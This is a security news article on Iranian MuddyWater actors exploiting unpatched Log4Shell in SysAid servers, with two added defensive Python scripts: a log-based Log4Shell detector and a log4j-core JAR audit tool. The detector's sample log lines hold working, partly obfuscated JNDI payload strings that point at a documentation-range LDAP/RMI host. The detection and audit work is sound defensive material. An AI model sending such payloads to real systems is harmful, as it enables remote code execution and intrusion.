
Iranian Hackers Exploiting Unpatched Log4j 2 Bugs to Target Israeli Organizations


Iranian state-sponsored actors are continuing to exploit unpatched systems running Log4j 2 to target Israeli entities, underscoring the vulnerability's long tail[1] for remediation.

Microsoft attributed the latest set of activities to the
umbrella threat group[2]
tracked as MuddyWater[3]
(aka Cobalt Ulster, Mercury, Seedworm, or Static Kitten), which is
linked[4]
to the Iranian intelligence apparatus, the Ministry of Intelligence
and Security (MOIS).


The attacks are notable for using SysAid Server instances still unsecured against the Log4Shell flaw[5] as the initial access vector, marking[6] a departure[7] from the actors' usual pattern of exploiting VMware applications to breach target environments. Because Log4j ships bundled inside the affected application rather than as an operating-system package, such an instance stays exploitable until the vendor's fixed build is deployed, whatever the state of OS-level patching.
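The Log4Shell vector above is usually first visible in web-server access logs as a JNDI lookup string in a logged request field, and attackers routinely hide it behind nested Log4j lookups that defeat a plain search for "${jndi:". The following detector is an added example, not code from the article, Microsoft or SysAid: it collapses the nested lookups the way Log4j would resolve them and then looks for the JNDI lookup and its scheme. The access-log lines, the RFC 5737 addresses in them and the choice of the User-Agent field as the injection point are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in web access logs, including the
nested-lookup obfuscation that defeats a naive search for "${jndi:".

Constructed example; the log lines below are made up, not from the incident.
"""
import re
from typing import List, Optional, Tuple

# An innermost ${...} lookup: one with no further ${ } nested inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After de-obfuscation: a JNDI lookup and its scheme, e.g. ${jndi:ldap://host/a}
_JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]+):", re.IGNORECASE)


def _eval_inner(body: str) -> Optional[str]:
    """Reduce one innermost lookup, approximating Log4j's StrSubstitutor for
    the three tricks attackers actually use. Returns None for anything else so
    that lookup is left untouched (a real ${jndi:...}, or a harmless ${date:...})."""
    head = body[:6].lower()
    if head == "lower:":                   # ${lower:J} -> "j"
        return body[6:].lower()
    if head == "upper:":                   # ${upper:n} -> "N"
        return body[6:].upper()
    if ":-" in body and not body.lower().startswith("jndi:"):
        return body.split(":-", 1)[1]      # ${env:NOPE:-j} and ${::-j} -> "j"
    return None


def normalize(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out, so that
    ${${lower:j}ndi:${::-l}dap://...} becomes ${jndi:ldap://...}.
    max_rounds bounds the work an adversarial input can cause."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            reduced = _eval_inner(m.group(1))
            if reduced is None:
                return m.group(0)
            changed = True
            return reduced

        text = _INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, normalized_lookup) for every line that
    carries a JNDI lookup once obfuscation is stripped."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((n, m.group(1).lower(), norm[m.start():end + 1]))
    return hits


# Constructed access-log lines (Combined Log Format). The payload sits in the
# User-Agent field, which Log4j-backed applications commonly log verbatim.
# 198.51.100.0/24 is an RFC 5737 documentation range, not a real attacker host.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jul/2022:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [23/Jul/2022:10:01:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [23/Jul/2022:10:01:17 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [23/Jul/2022:10:01:19 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${env:NOPE:-j}ndi:${env:NOPE:-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.12 - - [23/Jul/2022:10:01:21 +0000] "GET /docs HTTP/1.1" 200 9000 "-" "${date:yyyy} report"',
]

if __name__ == "__main__":
    for n, scheme, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme} lookup={lookup}")
```

Two caveats when running this over real logs: the normalizer only reduces the lookups an attacker needs for obfuscation (lower, upper and the ":-" default), so a payload built from other lookups would still need the generic "${" itself treated as suspicious in a user-controlled field; and the access log only shows what the front-end logged, so the Log4j application's own logs should be searched the same way.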

“After gaining access, Mercury establishes persistence, dumps
credentials, and moves laterally within the targeted organization
using both custom and well-known hacking tools, as well as built-in
operating system tools for its hands-on-keyboard attack,” Microsoft
said[8].


The tech giant’s threat intelligence team said it observed the
attacks between July 23 and 25, 2022.

A successful compromise is said to have been followed by the
deployment of web shells to execute commands that permit the actor
to conduct reconnaissance, establish persistence, steal
credentials, and facilitate lateral movement.

For command-and-control (C2) communication during the intrusions, the actor also relied on eHorus[9], a commercial remote monitoring and management tool, and on Ligolo[10], its reverse-tunneling tool of choice.


The findings come as the U.S. Department of Homeland Security’s
Cyber Safety Review Board (CSRB) deemed[11] the critical
vulnerability in the open-source Java-based logging framework an
endemic weakness that will continue to plague organizations for
years to come as exploitation evolves.

Because Log4j is so widely used[12] across many suppliers' software and services, nation-state actors and commodity operators alike have opportunistically exploited the vulnerability to mount a wide range of attacks.
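The reason the long tail exists is that Log4j copies sit inside application bundles, where OS package managers never see them. The audit script below is an added example rather than anything from the article or the CSRB report: it walks a directory tree, reads each log4j-core JAR's manifest, compares the version against the releases that close CVE-2021-44228 and its follow-ups (CVE-2021-45046, CVE-2021-45105, CVE-2021-44832) on each maintained 2.x line, and also checks whether the JndiLookup class has been deleted, which was Apache's published interim workaround. The demo() fixture (three fake JARs in a temporary directory) is constructed test data, not files from any real host.

```python
"""Find log4j-core JARs under a directory tree and report which remain exposed
to Log4Shell. Fix thresholds: 2.17.1 (main line), 2.12.4 (Java 7 line),
2.3.2 (Java 6 line), the first releases on each line with all four
Log4Shell-era CVEs closed. The fixture built by demo() is constructed data.
"""
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
JAR_NAME = re.compile(r"^log4j-core(?:-([0-9][\w.\-]*))?\.jar$")


def parse_version(s: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9): good enough to order."""
    return tuple(int(x) for x in re.findall(r"\d+", s))


def is_exposed(v: Tuple[int, ...]) -> Optional[bool]:
    """True if this Log4j 2 version is below the last fix on its line; None for
    versions outside the 2.x series (1.x is end-of-life but not Log4Shell)."""
    if v[:1] != (2,):
        return None
    if v[:2] == (2, 3):       # Java 6 line
        return v < (2, 3, 2)
    if v[:2] == (2, 12):      # Java 7 line
        return v < (2, 12, 4)
    return v < (2, 17, 1)


def assess_jar(path: str) -> Dict[str, object]:
    """Read the version and JndiLookup presence from inside the JAR; the
    filename is only a fallback, since repackaged JARs are often renamed."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if m:
                version = m.group(1)
    if version is None:
        m = JAR_NAME.match(os.path.basename(path))
        version = m.group(1) if m else None
    has_jndi = JNDI_LOOKUP_CLASS in names
    exposed = is_exposed(parse_version(version)) if version else None
    if exposed is None:
        status = "unknown"
    elif not exposed:
        status = "fixed"
    elif has_jndi:
        status = "exposed"
    else:
        # JndiLookup.class deleted: blocks the JNDI path (the Log4Shell RCE),
        # but the build is still below the fixed release, so upgrade anyway.
        status = "mitigated"
    return {"path": path, "version": version, "jndi_lookup": has_jndi, "status": status}


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Assess every log4j-core JAR under root. Caveat: this does not descend
    into WAR/EAR/fat JARs, where log4j-core is very often nested."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if JAR_NAME.match(f):
                results.append(assess_jar(os.path.join(dirpath, f)))
    return sorted(results, key=lambda r: r["path"])


def _write_jar(path: str, version: str, keep_jndi: bool) -> None:
    """Write a minimal fake log4j-core JAR (constructed fixture): a manifest
    and, optionally, an empty stand-in for JndiLookup.class."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    "Manifest-Version: 1.0\r\nImplementation-Version: %s\r\n" % version)
        if keep_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"")


def demo() -> Dict[str, str]:
    """Build constructed JARs in a temp dir; return {relative path: status}."""
    root = tempfile.mkdtemp(prefix="log4j-audit-")
    _write_jar(os.path.join(root, "app1", "lib", "log4j-core-2.14.1.jar"), "2.14.1", True)
    _write_jar(os.path.join(root, "app2", "lib", "log4j-core-2.14.1.jar"), "2.14.1", False)
    _write_jar(os.path.join(root, "app3", "lib", "log4j-core-2.17.1.jar"), "2.17.1", True)
    _write_jar(os.path.join(root, "legacy", "log4j-core-2.12.1.jar"), "2.12.1", True)
    return {os.path.relpath(r["path"], root).replace(os.sep, "/"): r["status"]
            for r in scan_tree(root)}


if __name__ == "__main__":
    for rel, status in demo().items():
        print(f"{status:10s} {rel}")
```

On a real host, point scan_tree at the application roots (and extract WAR/EAR archives first, since the walk does not look inside them); "mitigated" results are the ones most likely to be mistaken for done, because the RCE path is closed but the library is still an unsupported build.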

The Log4Shell attacks also follow a recent report from Mandiant
that detailed an espionage campaign aimed at Israeli shipping,
government, energy, and healthcare organizations by a likely
Iranian hacking group dubbed UNC3890[13].

References

  1. long tail (thehackernews.com)
  2. umbrella threat group (thehackernews.com)
  3. MuddyWater (thehackernews.com)
  4. linked (thehackernews.com)
  5. Log4Shell flaw (thehackernews.com)
  6. marking (thehackernews.com)
  7. departure (thehackernews.com)
  8. said (www.microsoft.com)
  9. eHorus (ehorus.com)
  10. reverse-tunneling tool (thehackernews.com)
  11. deemed (www.dhs.gov)
  12. wide usage (www.microsoft.com)
  13. UNC3890 (thehackernews.com)
